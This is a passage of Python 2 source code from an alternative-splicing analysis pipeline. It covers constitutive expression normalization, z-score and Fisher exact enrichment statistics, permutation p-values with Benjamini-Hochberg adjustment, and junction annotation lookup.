except ValueError: midas_p = 'NA'
else: midas_p = 'NA'
if dI>alt_exon_logfold_cutoff and (anovaNIp < p_threshold or perform_permutation_analysis == 'yes' or anovaNIp == 'NA' or anovaNIp == 1): #and abs_log_ratio>1 and ttest_exp_p<0.05: ###and ge_threshold_count==2
#print [dI, probeset1,probeset2, anovaNIp, alt_exon_logfold_cutoff];kill
ejd = ExonJunctionData(dI,probeset1,probeset2,pp1,pp2,'upregulated',event_call,critical_exon_list,affygene,ped1,ped2)
ejd.setConstitutiveFold(ge_fold); ejd.setConstitutiveExpression(constit_exp1)
if array_type == 'RNASeq':
ejd.setNovelEvent(novel_event)
splice_event_list.append((dI,ejd))
else: excluded_probeset_db[affygene+':'+critical_exon_list[1][0]] = probeset1, affygene, dI, 'NA', anovaNIp
statistics.adjustPermuteStats(permute_p_values)
ex_db = splice_event_list, probeset_comp_db, permute_p_values, excluded_probeset_db
original_fold_dbase = fold_dbase; original_avg_const_exp_db=[]; nonlog_NI_db = []; fold_dbase=[]
summary_data_db['denominator_exp_events']=events_examined
del avg_const_exp_db; del gene_db; del constitutive_gene_db; gene_expression_diff_db={}
if export_NI_values == 'yes': adjoutput.close()
print len(splice_event_list), 'alternative exons out of %s exon events examined' % events_examined
fold_dbase=[]; original_fold_dbase=[]; exon_db=[]; constitutive_gene_db=[]; addback_genedb=[]
gene_db=[]; missing_genedb=[]
"""
print 'local vars'
all = [var for var in locals() if (var[:2], var[-2:]) != ("__", "__")]
for var in all:
try:
if len(locals()[var])>500: print var, len(locals()[var])
except Exception: null=[]
"""
return conditions,adj_fold_dbase,nonlog_NI_db,dataset_name,gene_expression_diff_db,midas_db,ex_db,si_db
class ProbesetExpressionData:
    """Container for one probeset's expression statistics in a single pairwise
    group comparison (baseline vs. experimental).

    All accessor methods return strings (for direct report writing) except
    Annotation(), which returns the annotation as stored.
    """
    def __init__(self, baseline_exp, experimental_exp, fold_change, adj_fold, ttest_raw_exp, annotation):
        self.baseline_exp = baseline_exp; self.experimental_exp = experimental_exp
        self.fold_change = fold_change; self.adj_fold = adj_fold
        self.ttest_raw_exp = ttest_raw_exp; self.annotation = annotation
    def BaselineExp(self): return str(self.baseline_exp)
    def ExperimentalExp(self): return str(self.experimental_exp)
    def FoldChange(self): return str(self.fold_change)
    def AdjFold(self): return str(self.adj_fold)
    def ExpPval(self): return str(self.ttest_raw_exp)
    def Annotation(self): return self.annotation
    # Bug fix: FoldChange() was called without self., raising NameError on repr()
    def __repr__(self): return self.BaselineExp()+'|'+self.FoldChange()
def agglomerateInclusionProbesets(array_raw_group_values,exon_inclusion_db):
    """Merge the expression profiles of inclusion probesets that report the
    same splice event into a single combined entry.

    For every exclusion probeset with two or more inclusion probesets, the
    inclusion profiles present in array_raw_group_values are averaged (via
    combine_profiles) and stored under a '|'-joined probeset identifier,
    mirroring ExonAnnotate_module.identifyPutativeSpliceEvents.  The input
    dictionary is updated in place and returned.
    """
    for excl_probeset in exon_inclusion_db:
        incl_probesets = exon_inclusion_db[excl_probeset]
        if len(incl_probesets) > 1:
            # Collect the profiles of inclusion probesets actually measured;
            # require the exclusion probeset itself to be measured as well.
            event_profiles = [array_raw_group_values[incl_probeset]
                              for incl_probeset in incl_probesets
                              if incl_probeset in array_raw_group_values
                              and excl_probeset in array_raw_group_values]
            # The original un-agglomerated entries are intentionally retained.
            if len(event_profiles) > 0:
                combined_event_profile = combine_profiles(event_profiles)
                array_raw_group_values['|'.join(incl_probesets)] = combined_event_profile
    return array_raw_group_values
def combine_profiles(profile_list):
    """Element-wise average of the expression profiles in profile_list.

    Each profile is a mapping of key -> list of values; the per-key list
    length is taken from the first profile only, and every profile that
    contains a key contributes to that key's averages.  Returns a new mapping
    of key -> list of averaged values (statistics.avg per position).
    """
    # Record the expected list length per key, using only the first profile.
    profile_group_sizes = {}
    for first_profile in profile_list:
        for key in first_profile:
            profile_group_sizes[key] = len(first_profile[key])
        break
    combined = {}
    for key in profile_group_sizes:
        averaged_values = []
        for position in range(profile_group_sizes[key]):
            values_at_position = [db[key][position] for db in profile_list if key in db]
            averaged_values.append(statistics.avg(values_at_position))
        combined[key] = averaged_values
    return combined
def constitutive_exp_normalization(fold_db,stats_dbase,exon_db,constitutive_probeset_db):
    """For every expression value, normalize to the expression of the constitutive gene features for that condition,
    then store those ratios (probeset_exp/avg_constitutive_exp) and regenerate expression values relative only to the
    baseline avg_constitutive_exp, for all conditions, to normalize out gene expression changes

    Reads module globals: remove_transcriptional_regulated_genes,
    only_include_constitutive_containing_genes, factor_out_expression_changes,
    array_type, log_fold_cutoff, summary_data_db, plus the project modules
    statistics and math.  Sets the global gene_analyzed.
    Returns: adj_fold_dbase, nonlog_NI_db, conditions, gene_db,
    constitutive_gene_db, constitutive_fold_change, avg_const_exp_db."""
    #print "\nParameters:"
    #print "Factor_out_expression_changes:",factor_out_expression_changes
    #print "Only_include_constitutive_containing_genes:",only_include_constitutive_containing_genes
    #print "\nAdjusting probeset average intensity values to factor out condition specific expression changes for optimal splicing descrimination"
    gene_db = {}; constitutive_gene_db = {}
    ### organize everything by gene
    # conditions = number of expression columns, sampled from any one probeset
    for probeset in fold_db: conditions = len(fold_db[probeset]); break
    remove_diff_exp_genes = remove_transcriptional_regulated_genes
    # With more than two conditions the differential-expression gene filter is disabled
    if conditions > 2: remove_diff_exp_genes = 'no'
    for probeset in exon_db:
        affygene = exon_db[probeset].GeneID() #exon_db[probeset] = affygene,exons,ensembl,block_exon_ids,block_structure,comparison_info
        if probeset in fold_db:
            try: gene_db[affygene].append(probeset)
            except KeyError: gene_db[affygene] = [probeset]
            if probeset in constitutive_probeset_db and (only_include_constitutive_containing_genes == 'yes' or factor_out_expression_changes == 'no'):
                #the second conditional is used to exlcude constitutive data if we wish to use all probesets for
                #background normalization rather than just the designated 'gene' probesets.
                if probeset in stats_dbase:
                    try: constitutive_gene_db[affygene].append(probeset)
                    except KeyError: constitutive_gene_db[affygene] = [probeset]
    if len(constitutive_gene_db)>0:
        ###This is blank when there are no constitutive and the above condition is implemented
        gene_db2 = constitutive_gene_db
    else: gene_db2 = gene_db
    # Step 1: per-gene, per-condition average of the (reconstructed) expression
    # values of the chosen probesets; exp = fold + baseline from stats_dbase.
    avg_const_exp_db = {}
    for affygene in gene_db2:
        probeset_list = gene_db2[affygene]
        x = 0
        while x < conditions:
            ### average all exp values for constitutive probesets for each condition
            exp_list=[]
            for probeset in probeset_list:
                probe_fold_val = fold_db[probeset][x]
                baseline_exp = stats_dbase[probeset][0]
                exp_val = probe_fold_val + baseline_exp
                exp_list.append(exp_val)
            avg_const_exp = statistics.avg(exp_list)
            try: avg_const_exp_db[affygene].append(avg_const_exp)
            except KeyError: avg_const_exp_db[affygene] = [avg_const_exp]
            x += 1
    # Step 2: normalize every probeset's expression against the constitutive
    # average (non-log ratios), and derive gene-expression-adjusted folds.
    adj_fold_dbase={}; nonlog_NI_db={}; constitutive_fold_change={}
    for affygene in avg_const_exp_db: ###If we only wish to include propper constitutive probes, this will ensure we only examine those genes and probesets that are constitutive
        probeset_list = gene_db[affygene]
        x = 0
        while x < conditions:
            exp_list=[]
            for probeset in probeset_list:
                expr_to_subtract = avg_const_exp_db[affygene][x]
                baseline_const_exp = avg_const_exp_db[affygene][0]
                probe_fold_val = fold_db[probeset][x]
                baseline_exp = stats_dbase[probeset][0]
                exp_val = probe_fold_val + baseline_exp
                exp_val_non_log = statistics.log_fold_conversion_fraction(exp_val)
                expr_to_subtract_non_log = statistics.log_fold_conversion_fraction(expr_to_subtract)
                baseline_const_exp_non_log = statistics.log_fold_conversion_fraction(baseline_const_exp)
                if factor_out_expression_changes == 'yes':
                    exp_splice_valff = exp_val_non_log/expr_to_subtract_non_log
                else: #if no, then we just normalize to the baseline constitutive expression in order to keep gene expression effects (useful if you don't trust constitutive feature expression levels)
                    exp_splice_valff = exp_val_non_log/baseline_const_exp_non_log
                constitutive_fold_diff = expr_to_subtract_non_log/baseline_const_exp_non_log
                ###To calculate adjusted expression, we need to get the fold change in the constitutive avg (expr_to_subtract/baseline_const_exp) and divide the experimental expression
                ###By this fold change.
                ge_adj_exp_non_log = exp_val_non_log/constitutive_fold_diff #gives a GE adjusted expression
                # NOTE(review): 'dog' below is an undefined name; on a log
                # failure this print deliberately raises NameError to halt the
                # run with diagnostics — confirm this is still the intent.
                try: ge_adj_exp = math.log(ge_adj_exp_non_log,2)
                except ValueError: print probeset,ge_adj_exp_non_log,constitutive_fold_diff,exp_val_non_log,exp_val,baseline_exp, probe_fold_val, dog
                adj_probe_fold_val = ge_adj_exp - baseline_exp
                ### Here we normalize probeset expression to avg-constitutive expression by dividing probe signal by avg const.prove sig (should be < 1)
                ### refered to as steady-state normalization
                if array_type != 'AltMouse' or (probeset not in constitutive_probeset_db):
                    """Can't use constitutive gene features since these have no variance for pearson analysis
                    Python will approximate numbers to a small decimal point range. If the first fold value is
                    zero, often, zero will be close to but not exactly zero. Correct below """
                    try:
                        adj_fold_dbase[probeset].append(adj_probe_fold_val)
                    except KeyError:
                        if abs(adj_probe_fold_val - 0) < 0.0000001: #make zero == exactly to zero
                            adj_probe_fold_val = 0
                        adj_fold_dbase[probeset] = [adj_probe_fold_val]
                    try: nonlog_NI_db[probeset].append(exp_splice_valff) ###ratio of junction exp relative to gene expression at that time-point
                    except KeyError: nonlog_NI_db[probeset] = [exp_splice_valff]
            n = 0
            #if expr_to_subtract_non_log != baseline_const_exp_non_log: ###otherwise this is the first value in the expression array
            if x!=0: ###previous expression can produce errors when multiple group averages have identical values
                fold_change = expr_to_subtract_non_log/baseline_const_exp_non_log
                fold_change_log = math.log(fold_change,2)
                constitutive_fold_change[affygene] = fold_change_log
                ### If we want to remove any genes from the analysis with large transcriptional changes
                ### that may lead to false positive splicing calls (different probeset kinetics)
                if remove_diff_exp_genes == 'yes':
                    if abs(fold_change_log) > log_fold_cutoff:
                        del constitutive_fold_change[affygene]
                        try: del adj_fold_dbase[probeset]
                        except KeyError: n = 1
                        try: del nonlog_NI_db[probeset]
                        except KeyError: n = 1
            """elif expr_to_subtract_non_log == baseline_const_exp_non_log: ###This doesn't make sense, since n can't equal 1 if the conditional is false (check this code again later 11/23/07)
                if n == 1:
                    del adj_fold_dbase[probeset]
                    del nonlog_NI_db[probeset]"""
            x += 1
    print "Intensity normalization complete..."
    if factor_out_expression_changes == 'no':
        adj_fold_dbase = fold_db #don't change expression values
    print len(constitutive_fold_change), "genes undergoing analysis for alternative splicing/transcription"
    summary_data_db['denominator_exp_genes']=len(constitutive_fold_change)
    """
    mir_gene_count = 0
    for gene in constitutive_fold_change:
        if gene in gene_microRNA_denom: mir_gene_count+=1
    print mir_gene_count, "Genes with predicted microRNA binding sites undergoing analysis for alternative splicing/transcription"
    """
    global gene_analyzed; gene_analyzed = len(constitutive_gene_db)
    return adj_fold_dbase, nonlog_NI_db, conditions, gene_db, constitutive_gene_db,constitutive_fold_change, avg_const_exp_db
class TranscriptionData:
    """Pairs a gene's constitutive (gene-level) fold change with any
    RNA-processing/binding-factor annotation recorded for that gene."""
    def __init__(self, constitutive_fold, rna_processing_annotation):
        self._constitutive_fold = constitutive_fold; self._rna_processing_annotation = rna_processing_annotation
    def ConstitutiveFold(self): return self._constitutive_fold
    def ConstitutiveFoldStr(self): return str(self._constitutive_fold)
    def RNAProcessing(self): return self._rna_processing_annotation
    # Bug fix: RNAProcessing() was called without self., raising NameError on repr()
    def __repr__(self): return self.ConstitutiveFoldStr()+'|'+self.RNAProcessing()
def constitutive_expression_changes(constitutive_fold_change,annotate_db):
    """Wrap each gene's constitutive fold change in a TranscriptionData object,
    attaching any substantive RNA-processing annotation from annotate_db.

    Used as the gene-expression filter for ASPIRE.  Returns a mapping of
    gene ID -> TranscriptionData.
    """
    gene_expression_diff_db = {}
    for affygene in constitutive_fold_change:
        rna_processing_annotation = ''
        if affygene in annotate_db:
            annotation = annotate_db[affygene].RNAProcessing()
            # Annotations of four characters or fewer are treated as empty placeholders
            if len(annotation) > 4:
                rna_processing_annotation = annotation
        ###Add in evaluation of RNA-processing/binding factor
        gene_expression_diff_db[affygene] = TranscriptionData(
            constitutive_fold_change[affygene], rna_processing_annotation)
    return gene_expression_diff_db
def constitutive_exp_normalization_raw(gene_db,constitutive_gene_db,array_raw_group_values,exon_db,y,avg_const_exp_db):
    """normalize expression for raw expression data (only for non-baseline data)

    For group index y, appends the per-condition average constitutive (or,
    when absent, all-probeset) expression of every gene to avg_const_exp_db.
    Reads module globals only_include_constitutive_containing_genes,
    analysis_method and the project statistics module; may define the global
    normalized_raw_exp_ratios.  Returns the updated avg_const_exp_db."""
    #avg_true_const_exp_db[affygene] = [avg_const_exp]
    temp_avg_const_exp_db={}
    # conditions = number of samples in group y, sampled from any one probeset
    for probeset in array_raw_group_values:
        conditions = len(array_raw_group_values[probeset][y]); break #number of raw expresson values to normalize
    for affygene in gene_db:
        ###This is blank when there are no constitutive or the above condition is implemented
        if affygene in constitutive_gene_db:
            probeset_list = constitutive_gene_db[affygene]
            z = 1
        else: ###so we can analyze splicing independent of gene expression even if no 'gene' feature is present
            probeset_list = gene_db[affygene]
            z = 0
        x = 0
        while x < conditions:
            ### average all exp values for constitutive probesets for each conditionF
            exp_list=[]
            for probeset in probeset_list:
                try: exp_val = array_raw_group_values[probeset][y][x] ### try statement is used for constitutive probes that were deleted due to filtering in performExpressionAnalysis
                except KeyError: continue
                exp_list.append(exp_val)
            # 'null' marks a condition with no surviving probesets for this gene
            try: avg_const_exp = statistics.avg(exp_list)
            except Exception: avg_const_exp = 'null'
            if only_include_constitutive_containing_genes == 'yes' and avg_const_exp != 'null':
                # z == 1: only record genes backed by true constitutive probesets
                if z == 1:
                    try: avg_const_exp_db[affygene].append(avg_const_exp)
                    except KeyError: avg_const_exp_db[affygene] = [avg_const_exp]
                    try: temp_avg_const_exp_db[affygene].append(avg_const_exp)
                    except KeyError: temp_avg_const_exp_db[affygene] = [avg_const_exp]
            elif avg_const_exp != 'null': ###***
                try: avg_const_exp_db[affygene].append(avg_const_exp)
                except KeyError: avg_const_exp_db[affygene] = [avg_const_exp]
                try: temp_avg_const_exp_db[affygene].append(avg_const_exp)
                except KeyError: temp_avg_const_exp_db[affygene] = [avg_const_exp]
            x += 1
    if analysis_method == 'ANOVA':
        global normalized_raw_exp_ratios; normalized_raw_exp_ratios = {}
        for affygene in gene_db:
            probeset_list = gene_db[affygene]
            for probeset in probeset_list:
                # NOTE(review): 'x' is not reset here (it still equals
                # 'conditions' from the loop above), 'group_size' is not
                # defined in this function, and the loop body never increments
                # x — this branch looks broken/dead; confirm before relying on it.
                while x < group_size:
                    new_ratios = [] ### Calculate expression ratios relative to constitutive expression
                    exp_val = array_raw_group_values[probeset][y][x]
                    const_exp_val = temp_avg_const_exp_db[affygene][x]
                    ###Since the above dictionary is agglomerating all constitutive expression values for permutation,
                    ###we need an unbiased way to grab just those relevant const. exp. vals. (hence the temp dictionary)
                    #non_log_exp_val = statistics.log_fold_conversion_fraction(exp_val)
                    #non_log_const_exp_val = statistics.log_fold_conversion_fraction(const_exp_val)
                    #non_log_exp_ratio = non_log_exp_val/non_log_const_exp_val
                    log_exp_ratio = exp_val - const_exp_val
                    try: normalized_raw_exp_ratios[probeset].append(log_exp_ratio)
                    except KeyError: normalized_raw_exp_ratios[probeset] = [log_exp_ratio]
    return avg_const_exp_db
######### Z Score Analyses #######
class ZScoreData:
    """Enrichment statistics for one element (e.g. a protein domain or a
    microRNA binding site): observed/measured counts, z-score, null z-score,
    permutation p-value and BH-adjusted p-value.

    Count/score accessors return strings for direct report writing.
    """
    def __init__(self,element,changed,measured,zscore,null_z,gene_symbols):
        self._element = element
        self._changed = changed
        self._measured = measured
        self._zscore = zscore
        self._null_z = null_z
        self._gene_symbols = gene_symbols
    def ElementID(self): return self._element
    def Changed(self): return str(self._changed)
    def Measured(self): return str(self._measured)
    def AssociatedWithElement(self): return str(self._gene_symbols)
    def ZScore(self): return str(self._zscore)
    def SetP(self,p): self._permute_p = p
    def PermuteP(self): return str(self._permute_p)
    def SetAdjP(self,adjp): self._adj_p = adjp
    def AdjP(self): return str(self._adj_p)
    def PercentChanged(self):
        # Report 0 when the denominator is zero or non-numeric
        try:
            percent = float(self.Changed())/float(self.Measured())*100
        except Exception:
            percent = 0
        return str(percent)
    def NullZ(self): return self._null_z
    def Report(self):
        return self.ElementID()
    def __repr__(self): return self.Report()
class FDRStats(ZScoreData):
    """Minimal ZScoreData stand-in that only tracks a permutation p-value and
    (after adjustPermuteStats) its BH-adjusted p-value."""
    def __init__(self, p):
        self._permute_p = p
    def AdjP(self):
        return str(self._adj_p)
def countGenesForElement(permute_input_list,probeset_to_gene,probeset_element_db):
    """Count, for every element, how many distinct genes the supplied probesets
    map to.

    Probesets missing from either lookup table are skipped.  Returns a mapping
    of element -> unique gene count.
    """
    element_gene_db={}
    for probeset in permute_input_list:
        # Skip probesets absent from either mapping (matches the original
        # KeyError-driven behavior).
        if probeset not in probeset_element_db or probeset not in probeset_to_gene:
            continue
        gene = probeset_to_gene[probeset]
        for element in probeset_element_db[probeset]:
            element_gene_db.setdefault(element, []).append(gene)
    ### Count the number of unique genes per element
    for element in element_gene_db:
        element_gene_db[element] = len(set(element_gene_db[element]))
    return element_gene_db
def formatGeneSymbolHits(geneid_list):
    """Translate gene IDs to symbols and join them as 'sym1, sym2, ...'.

    Uses the module-global annotate_db; a gene with no annotation (or an empty
    symbol) falls back to its raw ID.
    """
    symbol_list = []
    for geneid in geneid_list:
        symbol = ''
        if geneid in annotate_db:
            symbol = annotate_db[geneid].Symbol()
        # Empty symbol -> report the gene ID itself
        if len(symbol) < 1:
            symbol = geneid
        symbol_list.append(symbol)
    return ', '.join(symbol_list)
def zscore(r,n,N,R):
    """Z-score for observing r hits among n element-linked genes, given R total
    hits within a population of N genes (normal approximation with a
    finite-population correction).  Raises ZeroDivisionError/ValueError for
    degenerate inputs; callers are expected to catch and default to 0."""
    expected = n*(R/N)  # expected hit count for this element
    variance = n*(R/N)*(1-(R/N))*(1-((n-1)/(N-1)))  # hypergeometric variance
    return (r - expected)/math.sqrt(variance)
def calculateZScores(hit_count_db,denom_count_db,total_gene_denom_count,total_gene_hit_count,element_type):
    """Compute an enrichment z-score for every element in denom_count_db.

    Side effects on module globals: stores a ZScoreData per element in
    original_domain_z_score_data or original_microRNA_z_score_data (depending
    on element_type) and seeds permuted_z_scores[element] with the observed
    score.  When perform_element_permutation_analysis == 'no', a Fisher exact
    p-value is assigned instead of a permutation p.  Returns (N, R)."""
    N = float(total_gene_denom_count) ###Genes examined
    R = float(total_gene_hit_count) ###AS genes
    for element in denom_count_db:
        element_denom_gene_count = denom_count_db[element]
        n = float(element_denom_gene_count) ###all genes associated with element
        if element in hit_count_db:
            element_hit_gene_count = len(hit_count_db[element])
            gene_symbols = formatGeneSymbolHits(hit_count_db[element])
            r = float(element_hit_gene_count) ###regulated genes associated with element
        else: r = 0; gene_symbols = ''
        # Degenerate inputs (e.g. n == N) make zscore raise; default to 0
        try: z = zscore(r,n,N,R)
        except Exception: z = 0; #print 'error:',element,r,n,N,R; kill
        try: null_z = zscore(0,n,N,R)
        except Exception: null_z = 0; #print 'error:',element,r,n,N,R; kill
        zsd = ZScoreData(element,r,n,z,null_z,gene_symbols)
        if element_type == 'domain': original_domain_z_score_data[element] = zsd
        elif element_type == 'microRNA': original_microRNA_z_score_data[element] = zsd
        permuted_z_scores[element] = [z]
        if perform_element_permutation_analysis == 'no':
            ### The below is an alternative to the permute t-statistic that is more effecient
            p = FishersExactTest(r,n,R,N)
            zsd.SetP(p)
    return N,R
######### Begin Permutation Analysis #######
def calculatePermuteZScores(permute_element_inputs,element_denominator_gene_count,N,R):
    """Score one batch of permuted inputs.

    For each permuted element -> gene-count mapping, compute the |z| score
    against the fixed denominators and append it to the module-global
    permuted_z_scores[element] list.  Kept minimal for speed.
    """
    for element_input_gene_count in permute_element_inputs:
        for element in element_input_gene_count:
            permuted_r = element_input_gene_count[element]
            denominator_n = element_denominator_gene_count[element]
            # Degenerate tables make zscore raise; count them as 0
            try:
                z = statistics.zscore(permuted_r,denominator_n,N,R)
            except Exception:
                z = 0
            permuted_z_scores[element].append(abs(z))
def calculatePermuteStats(original_element_z_score_data):
    """Assign a permutation p-value (via SetP) to every element's ZScoreData.

    Relies on module globals: permuted_z_scores (index 0 holds the observed
    score, the remainder the permuted scores), permutations (total permutation
    count) and permute_p.
    """
    for element in original_element_z_score_data:
        zsd = original_element_z_score_data[element]
        observed = abs(permuted_z_scores[element][0])
        permute_scores = permuted_z_scores[element][1:]  # drop the observed score
        nullz = zsd.NullZ()
        if abs(nullz) == observed:
            ### Pad with null z's for permutations in which no genes were found
            ### for this element — they still count toward the p-value, but only
            ### when the null z equals the observed score.
            missing = permutations - len(permute_scores)
            permute_scores += [abs(nullz)] * missing
        if len(permute_scores) > 0:
            p = permute_p(permute_scores, observed)
        else:
            p = 1
        zsd.SetP(p)
def FishersExactTest(r,n,R,N):
    """Two-tailed Fisher exact p-value for the 2x2 contingency table implied by
    r hits among n element genes versus R total hits among N genes."""
    hit_in = r              # regulated genes linked to the element
    miss_in = n - r         # element genes not regulated
    hit_out = R - r         # regulated genes outside the element
    miss_out = N - R - miss_in
    table = [[int(hit_in), int(miss_in)], [int(hit_out), int(miss_out)]]
    try:
        ### Scipy implementation - cuts down runtime by ~1/3rd
        oddsratio, pvalue = stats.fisher_exact(table)
        return pvalue
    except Exception:
        ### Fall back to the bundled pure-python implementation
        ft = fishers_exact_test.FishersExactTest(table)
        return ft.two_tail_p()
def adjustPermuteStats(original_element_z_score_data):
    """Benjamini-Hochberg adjust the permutation p-values of every element's
    ZScoreData object, storing the result via SetAdjP."""
    #1. Sort ascending the original input p value vector. Call this spval. Keep the original indecies so you can sort back.
    #2. Define a new vector called tmp. tmp= spval. tmp will contain the BH p values.
    #3. m is the length of tmp (also spval)
    #4. i=m-1
    #5 tmp[ i ]=min(tmp[i+1], min((m/i)*spval[ i ],1)) - second to last, last, last/second to last
    #6. i=m-2
    #7 tmp[ i ]=min(tmp[i+1], min((m/i)*spval[ i ],1))
    #8 repeat step 7 for m-3, m-4,... until i=1
    #9. sort tmp back to the original order of the input p values.
    spval=[]
    for element in original_element_z_score_data:
        zsd = original_element_z_score_data[element]
        p = float(zsd.PermuteP())
        spval.append([p,element])
    # NOTE: tmp aliases spval (same list object), so the in-place updates below
    # rewrite spval too; each entry carries its element name for the write-back.
    spval.sort(); tmp = spval; m = len(spval); i=m-2; x=0 ###Step 1-4
    while i > -1:
        tmp[i]=min(tmp[i+1][0], min((float(m)/(i+1))*spval[i][0],1)),tmp[i][1]; i -= 1
    # Write each adjusted p-value back onto its ZScoreData object
    for (adjp,element) in tmp:
        zsd = original_element_z_score_data[element]
        zsd.SetAdjP(adjp)
    spval=[]
def permute_p(null_list,true_value):
    """Permutation p-value: the fraction of permutations whose null score met
    or exceeded true_value.

    The denominator is the module-global permutations count, NOT
    len(null_list) — null_list may have been padded or truncated upstream.
    """
    exceed_count = 0
    for value in null_list:
        if value >= true_value:
            exceed_count += 1
    return (float(exceed_count)/float(permutations)) ###Multiply probabilty x2?
######### End Permutation Analysis #######
def exportZScoreData(original_element_z_score_data,element_type):
    """Write per-element z-score/permutation statistics to a tab-delimited
    '<dataset><method>-<element_type>-zscores.txt' file under
    AltResults/AlternativeOutput, sorted by permutation p-value with ties
    broken by descending measured-gene count.  Uses module globals root_dir,
    dataset_name, analysis_method, export, string and permuted_z_scores."""
    element_output = root_dir+'AltResults/AlternativeOutput/' + dataset_name + analysis_method+'-'+element_type+'-zscores.txt'
    data = export.ExportFile(element_output)
    headers = [element_type+'-Name','Number Changed','Number Measured','Percent Changed', 'Zscore','PermuteP','AdjP','Changed GeneSymbols']
    headers = string.join(headers,'\t')+'\n'
    data.write(headers); sort_results=[]
    #print "Results for",len(original_element_z_score_data),"elements exported to",element_output
    for element in original_element_z_score_data:
        zsd=original_element_z_score_data[element]
        # 'kill' is an undefined name: referencing it deliberately aborts the
        # run when an element lacks its permutation statistics
        try: results = [zsd.Changed(), zsd.Measured(), zsd.PercentChanged(), zsd.ZScore(), zsd.PermuteP(), zsd.AdjP(), zsd.AssociatedWithElement()]
        except AttributeError: print element,len(permuted_z_scores[element]);kill
        results = [element] + results
        results = string.join(results,'\t') + '\n'
        # Sort key: (permute p ascending, -1/measured => larger counts first)
        sort_results.append([float(zsd.PermuteP()),-1/float(zsd.Measured()),results])
    sort_results.sort()
    for values in sort_results:
        results = values[2]
        data.write(results)
    data.close()
def getInputsForPermutationAnalysis(exon_db):
    """Build the permutation-analysis denominator from exon_db.

    When the module-global filter_for_AS is 'yes', only probesets whose
    SplicingCall() is 1 qualify; otherwise every probeset does.  Returns
    (probeset -> gene ID mapping, list of qualifying probesets).
    """
    ### Filter fold_dbase, which is the proper denominator
    probeset_to_gene = {}
    denominator_list = []
    for probeset in exon_db:
        # Skip probesets without a positive splicing call when filtering for AS
        if filter_for_AS == 'yes' and exon_db[probeset].SplicingCall() != 1:
            continue
        probeset_to_gene[probeset] = exon_db[probeset].GeneID()
        denominator_list.append(probeset)
    return probeset_to_gene, denominator_list
def getJunctionSplicingAnnotations(regulated_exon_junction_db):
    """Link regulated junction probesets back to critical-exon annotations.

    Loads the species/platform-appropriate exon annotation file, indexes it by
    'gene:critical_exon' for the supplied junctions, and returns a mapping of
    junction probeset(s) -> annotation object, merging annotations when a
    junction spans multiple critical exons.  Uses module globals array_type,
    explicit_data_type, root_dir, species, plus project helpers
    getFilteredFilename, importSplicingAnnotationDatabase, AffyExonSTData,
    string and unique."""
    filter_status = 'yes'
    ########### Import critical exon annotation for junctions, build through the exon array analysis pipeline - link back to probesets
    filtered_arrayids={}; critical_probeset_annotation_db={}
    # Choose the annotation source file by platform / data type
    if array_type == 'RNASeq' and explicit_data_type == 'null':
        critical_exon_annotation_file = root_dir+'AltDatabase/'+species+'/'+array_type+'/'+species+'_Ensembl_exons.txt'
    elif array_type == 'RNASeq' and explicit_data_type != 'null':
        critical_exon_annotation_file = root_dir+'AltDatabase/'+species+'/'+array_type+'/'+species+'_Ensembl_junctions.txt'
    else:
        critical_exon_annotation_file = "AltDatabase/"+species+"/"+array_type+"/"+species+"_Ensembl_"+array_type+"_probesets.txt"
        critical_exon_annotation_file = filename=getFilteredFilename(critical_exon_annotation_file)
    # Index each regulated junction under every 'gene:critical_exon' key
    for uid in regulated_exon_junction_db:
        gene = regulated_exon_junction_db[uid].GeneID()
        critical_exons = regulated_exon_junction_db[uid].CriticalExons()
        """### It appears that each critical exon for junction arrays can be a concatenation of multiple exons, making this unnecessary
        if len(critical_exons)>1 and array_type == 'junction':
            critical_exons_joined = string.join(critical_exons,'|')
            filtered_arrayids[gene+':'+critical_exon].append(uid)"""
        for critical_exon in critical_exons:
            # 'kill' is an undefined name: referencing it deliberately aborts
            # the run on an unexpected TypeError here
            try:
                try: filtered_arrayids[gene+':'+critical_exon].append(uid)
                except TypeError: print gene, critical_exon, uid;kill
            except KeyError: filtered_arrayids[gene+':'+critical_exon]=[uid]
    critical_exon_annotation_db = importSplicingAnnotationDatabase(critical_exon_annotation_file,'exon-fake',filtered_arrayids,filter_status);null=[] ###The file is in exon centric format, so designate array_type as exon
    # Attach each imported exon annotation to its junction probeset(s)
    for key in critical_exon_annotation_db:
        ced = critical_exon_annotation_db[key]
        for junction_probesets in filtered_arrayids[key]:
            try: critical_probeset_annotation_db[junction_probesets].append(ced) ###use for splicing and Exon annotations
            except KeyError: critical_probeset_annotation_db[junction_probesets] = [ced]
    # Collapse multi-exon annotation lists into a single combined annotation
    for junction_probesets in critical_probeset_annotation_db:
        if len(critical_probeset_annotation_db[junction_probesets])>1: ###Thus multiple exons associated, must combine annotations
            exon_ids=[]; external_exonids=[]; exon_regions=[]; splicing_events=[]
            for ed in critical_probeset_annotation_db[junction_probesets]:
                ensembl_gene_id = ed.GeneID(); transcript_cluster_id = ed.ExternalGeneID()
                exon_ids.append(ed.ExonID()); external_exonids.append(ed.ExternalExonIDs()); exon_regions.append(ed.ExonRegionID()); se = string.split(ed.SplicingEvent(),'|')
                for i in se: splicing_events.append(i)
            splicing_events = unique.unique(splicing_events) ###remove duplicate entries
            exon_id = string.join(exon_ids,'|'); external_exonid = string.join(external_exonids,'|'); exon_region = string.join(exon_regions,'|'); splicing_event = string.join(splicing_events,'|')
            probe_data = AffyExonSTData(ensembl_gene_id, exon_id, external_exonid, '', exon_region, splicing_event, '','')
            if array_type != 'RNASeq': probe_data.setTranscriptCluster(transcript_cluster_id)
            critical_probeset_annotation_db[junction_probesets] = probe_data
        else:
            critical_probeset_annotation_db[junction_probesets] = critical_probeset_annotation_db[junction_probesets][0]
    return critical_probeset_annotation_db
def determineExternalType(external_probeset_db):
    """Classify an imported external probeset result set as 'JETTA' or 'generic'
    and normalize it to {probeset: (score, p-value)}.

    A 'TC' key signals JETTA-formatted input: the first row of
    external_probeset_db['TC'] is a header row naming the columns of interest
    (PsId, PS:norm_expr_fold_change, MADS:pv_1over2, MADS:pv_2over1).
    Otherwise the data are treated as generic two-column rows, and the roles of
    the two columns (score vs. p-value) are inferred from value magnitude:
    any column whose absolute values exceed 1 cannot hold p-values.

    Returns (external_probeset_db2, ext_type).
    """
    external_probeset_db2={}
    if 'TC' in external_probeset_db:
        ext_type = 'JETTA'
        ### Map header names to their column positions.
        ### BUGFIX: previously this stored temp_index[i]=i (integer keys), so the
        ### header-name lookups below could never succeed, MADS_p2_index was
        ### never bound and the branch crashed with a NameError on the first row.
        temp_index={}
        for i, name in enumerate(external_probeset_db['TC'][0]): temp_index[name] = i
